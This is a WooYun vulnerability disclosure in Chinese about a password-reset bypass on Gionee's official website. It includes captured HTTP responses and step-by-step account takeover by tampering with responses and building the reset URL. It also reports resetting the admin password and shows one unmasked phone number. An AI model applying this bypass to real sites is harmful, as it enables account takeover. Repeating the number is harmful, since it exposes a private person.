当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0119753

漏洞标题:金立手机官网可重置任意用户密码(admin账号测试)

相关厂商:gionee.com

漏洞作者: 路人甲

提交时间:2015-06-11 13:57

修复时间:2015-07-27 10:14

公开时间:2015-07-27 10:14

漏洞类型:网络设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-11: 细节已通知厂商并且等待厂商处理中
2015-06-12: 厂商已经确认,细节仅向厂商公开
2015-06-22: 细节向核心白帽子及相关领域专家公开
2015-07-02: 细节向普通白帽子公开
2015-07-12: 细节向实习白帽子公开
2015-07-27: 细节向公众公开

简要描述:

找不到工作,你们要我么,即将失业的游民!!!
可怜我给高点rank吧,呜呜~~~~~~~~~

详细说明:

0x1:自己的用户走一遍正确的流程,记录下有用的响应包。

q.png


下一步到获取验证码的页面(绑定手机的用户),接着获取验证码输入正确的验证码下一步截取响应包。

w.png


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 11 Jun 2015 03:06:53 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Content-Language: zh-CN
Content-Length: 4100
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>找回密码-验证身份</title>
<link href="../static/css/reset.css"	rel="stylesheet" type="text/css" />
<link href="../static/css/common_index.css"	rel="stylesheet" type="text/css" />
<link rel="shortcut icon" href="../favicon.ico" />
<link rel="Bookmark" href="../favicon.ico" />
</head>
<body>
	<div id="ma_reg_container">
		<div id="ma_reg_header">
			<div class="ma_in_header cl">
				<a href="http://www.gionee.com/" class="ma_logo z"><img src="../static/images/common/login_logo.png" /></a>
			</div>
		</div>
		<div id="ma_content" class="cl">
			<div class="stephd cl">
				<h1 class="t1 z">找回密码</h1>
				<ul class="step_nav y" id="stepTwo">
					<li>填写账户</li>
					<li class="on">验证身份</li>
					<li>设置新密码</li>
					<li class="tow">完成</li>
				</ul>
			</div>
		 	<div class="w960bx">
			<div class="ma_in_reg_content_right">
				<ul>
					<li class="w3_log_tit mbt10">请选择验证方式:</li>
					<li class="ma_login_input_1">
						<select class="find_psw_selct" name="methods" id="Jmethod">
					    							    <option value="130*****882" type="2">手机</option>
						</select>	
						<input type="hidden" id="Jcss" value="orange" />	
						<input type="hidden" id="Jservice" value="http://shop.gionee.com/login_success.shtml" />			
					<li class="w3_log_tit mbt10" id="Jhint">您的手机号码是:130*****882</li>
					
				</ul>
				<div class="ma_reg_btn_box">
						<button class="ma_reg_btn z" type="button" style="display: none"  id="JsetMail">
							发送验证邮件
						</button>
					  	<button class="ma_reg_btn z" type="button" id="JsetMobile">
							发送验证短信
						</button>			
					</div>
			</div>
		</div>
		</div>
	</div>
	<style>
.ft_white { width: 100%; padding: 10px 0; text-align: center; border-top: #dddddd 1px solid; color: #676767;font-family:"Microsoft Yahei",arial,simsun; line-height: 35px}
.ft_white a{color: #676767} 
span.pipe{} 
</style>
<div class="ft_white">  
    <div class="ft_cont">
        服务热线:400-779-6666 <span class="pipe">|</span> <a href="/help_detail/63" target="_blank">隐私保护</a> <span class="pipe">|</span> <a href="http://www.gionee.com/op-webmap.shtml" target="_blank">网站地图</a><br/>
        Copyright &copy; 2013 深圳市金立通信设备有限公司 版权所有 粤ICP备05087105号
    </div>    
</div>
<script type="text/javascript" src="../static/js/jquery-1.7.1.min.js"></script>
<script type="text/javascript" src="../static/js/core.js"></script>
<script>
(function(){
	var domMethod=$id("Jmethod"),domSetMail=$id("JsetMail"),domSetMobile=$id("JsetMobile"),domHint=$id("Jhint");
	var css=$id("Jcss").value,service=$id("Jservice").value;
	
	$addEvent	(domMethod,"change",function(e){
		var value=this.value,type;
		for(var i=0,childs=this.childNodes,len=childs.length;i<len;i++){
			if(childs[i].value==value){
				type=childs[i].getAttribute("type");
			}
		}
		if(type==1){
			domSetMail.style.display="block";
			domSetMobile.style.display="none";
			domHint.innerHTML="您的邮箱是:"+value;
		}else{
			domSetMail.style.display="none";
			domSetMobile.style.display="block";	
			domHint.innerHTML="您的手机号码是:"+value;		
		}
	});
	
	if(domSetMail){
		$addEvent	(domSetMail,"click",function(){
			$ajaxSendPwdMail({css:css,service:service},function(data){
				if(data && data.code==0){
					$setCookie("pwdMailTime",(new Date()).getTime());
					window.location.href=data.nextlink;
				}else{
					alert("网络出错");
				}
			});
		});
	}
	if(domSetMobile){
		$addEvent	(domSetMobile,"click",function(){
			$ajaxSendPwdSms({css:css,service:service},function(data){
				if(data && data.code==0){
					$setCookie("pwdMobileTime",(new Date()).getTime());
					window.location.href=data.nextlink;
				}else{
					alert("网络出错");
				}
			});
		});
	}
		
})();
</script>
</body>
</html>


e.png


0x2:放行之后到重置密码的页面。

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 11 Jun 2015 03:11:10 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Content-Language: zh-CN
Content-Length: 4765
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>找回密码-设置新密码</title>
<link href="../static/css/reset.css"	rel="stylesheet" type="text/css" />
<link href="../static/css/common_index.css"	rel="stylesheet" type="text/css" />
<link rel="shortcut icon" href="../favicon.ico" />
<link rel="Bookmark" href="../favicon.ico" />
</head>
<body>
	<div id="ma_reg_container">
		<div id="ma_reg_header">
			<div class="ma_in_header cl">
				<a href="http://www.gionee.com/" class="ma_logo z"><img
					src="../static/images/common/login_logo.png" />
				</a>
			</div>
		</div>
		<div id="ma_content" class="cl">
			<div class="stephd cl">
				<h1 class="t1 z">找回密码</h1>
				<ul class="step_nav y" id="stepThree">
					<li>填写账户</li>
					<li>验证身份</li>
					<li class="on">设置新密码</li>
					<li class="tow">完成</li>
				</ul>
			</div>			
	    <div class="w960bx">
			<div class="ma_in_reg_content_right">
				 <form action="/cas/n/phoneRestPwd" method="post" onsubmit="return checkForm();">
				<ul>
					<li class="w3_log_tit mabo20">登录帐号:13080180882</li>
					<li class="w3_log_tit mbt10">新登录密码:</li>
					<li class="ma_login_input_1"><input name="pwd" id="Jpwd" type="password" maxlength="30"   autocomplete="false" htmlEscape="true" /><div class="worm_tips_gray" id="JpwdHint"></div></li>
					<li class="w3_log_tit mbt10">确认密码:</li>
					<li class="ma_login_input_1"><input  name="pwd1" id="Jpwd1" type="password" maxlength="30"   autocomplete="false" htmlEscape="true" /><div class="worm_tips_gray" id="Jpwd1Hint"></div></li>
				</ul>
				<div class="ma_reg_btn_box">
						<button class="ma_reg_btn z" id="Jbtn" type="submit">确定</button>						
					</div>
					</form>
			</div>
		</div>
		</div>
	</div>
	<style>
.ft_white { width: 100%; padding: 10px 0; text-align: center; border-top: #dddddd 1px solid; color: #676767;font-family:"Microsoft Yahei",arial,simsun; line-height: 35px}
.ft_white a{color: #676767} 
span.pipe{} 
</style>
<div class="ft_white">  
    <div class="ft_cont">
        服务热线:400-779-6666 <span class="pipe">|</span> <a href="/help_detail/63" target="_blank">隐私保护</a> <span class="pipe">|</span> <a href="http://www.gionee.com/op-webmap.shtml" target="_blank">网站地图</a><br/>
        Copyright &copy; 2013 深圳市金立通信设备有限公司 版权所有 粤ICP备05087105号
    </div>    
</div>	
<script type="text/javascript" src="../static/js/jquery-1.7.1.min.js"></script>
	<script type="text/javascript" src="../static/js/md5.js"></script>
<script type="text/javascript" src="../static/js/core.js"></script>
<script>
//(function(){
	//校验密码
	var domTxt=$id("Jpwd"),domTxt1=$id("Jpwd1");
	var reg=/^.{6,30}$/;
	var hintMap={
		"Jpwd":{
			def:"",
			focus:"",
			empty:"请输入密码",
			err:"密码为6-30位",
			suc:""
		},		
		"Jpwd1":{
			def:"",
			focus:"",
			empty:"请确认新密码",
			err:"密码不一致",
			suc:""
		}
	};	
	var hintCssMap={
		def:"worm_tips_gray",
		err:"ma_reg_error"
	};
	$focusInput(domTxt,"",function(isfocus,isNull){
			var domid=domTxt.id;
			if(isfocus){
				setHint($id(domid+"Hint"),hintCssMap.def,hintMap[domid].def);
			}else{
				checkpwd(domid,0,isNull);
			}		
	});
	$focusInput(domTxt1,"",function(isfocus,isNull){
			var domid=domTxt1.id;
			if(isfocus){
				setHint($id(domid+"Hint"),hintCssMap.def,hintMap[domid].def);
			}else{
				checkpwd(domid,0,isNull);
			}		
	});
	function checkpwd(domid,isMust,isNull){
			var result=true,value=$.trim($id(domid).value);
			isNull=isNull?true:value.length==0;
			if(isNull){
				if(isMust){
					setHint($id(domid+"Hint"),hintCssMap.err,hintMap[domid].empty);
				}else{
					setHint($id(domid+"Hint"),hintCssMap.def,hintMap[domid].def);
				}
				result=false;
			}else{
				if(domid=="Jpwd"){
					if(value.match(reg)==null){
						result=false;
						setHint($id(domid+"Hint"),hintCssMap.err,hintMap[domid].err);
					}
				}else{
					if(value!==$id("Jpwd").value){						
						result=false;
						setHint($id(domid+"Hint"),hintCssMap.err,hintMap[domid].err);
					}
				}
			}
			return result;
	}	
	function checkForm(){		
		var result=true;
		if(!checkpwd("Jpwd",1)){
			result=false;
		}	
		if(!checkpwd("Jpwd1",1)){
			result=false;
		}	
		if(result){
			domTxt.value=hex_md5(domTxt.value);
			domTxt1.value=hex_md5(domTxt1.value);
		}
		return result;
	}
	function setHint(elem,css,msg){
		elem.innerHTML=msg;
		elem.className=css;	
		elem.style.display="block";	
	}	
//})();
</script>
</body>
</html>


r.png


u.png


看到修改密码的URL,就能很轻松的绕过验证码,只要用户绑定了手机号,在输入用户名之后能够在响应包里提取的绑定的手机号,之后构造修改用户密码的URL,即可成功重置密码,只是一种方法,下面说一种没有绑定手机号绑定邮箱或者木有绑定任何东西的用户,admin测试!

漏洞证明:

0x3:admin测试,验证码下一步阶段响应包修改为0x1里的code,放行看效果。

q.png


可以在响应包里提取到用户的uid和修改密码的类型,通过修改uid重置密码,用一个自己的用户绑定邮箱,之后修改uid也该修改,或者在这一步直接修改修改密码的方式,通过手机修改密码。

e.png


0x4:获取验证码会失败

r.png


{"code":"0","msg":"验证成功","nextlink":"/cas/n/phoneRestPwd?phoneNum=130xxxxxxx82&css=default&service="}


把code替换到验证错误的响应包,看下图。

t.png


就能到修改密码的页面,修改密码为wooyun123。
0x5:登录验证。

(I1Q6{Z1JZKKN63FBK}R537.png


修复方案:

完善服务端的验证机制,不单单是前端。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-06-12 10:13

厂商回复:

感谢对金立安全作出的贡献

最新状态:

暂无

漏洞评价:

评论

  1. 2015-06-11 16:10 | range ( 普通白帽子 | Rank:153 漏洞数:32 | 这个人有点懒,没有写个人简介)

    来来来,来我这。 -----北京市第一人民监狱

  2. 2015-07-27 10:31 | kevinchowsec ( 路人 | Rank:12 漏洞数:5 | 周凯文,信息安全爱好者。)

    前端验证!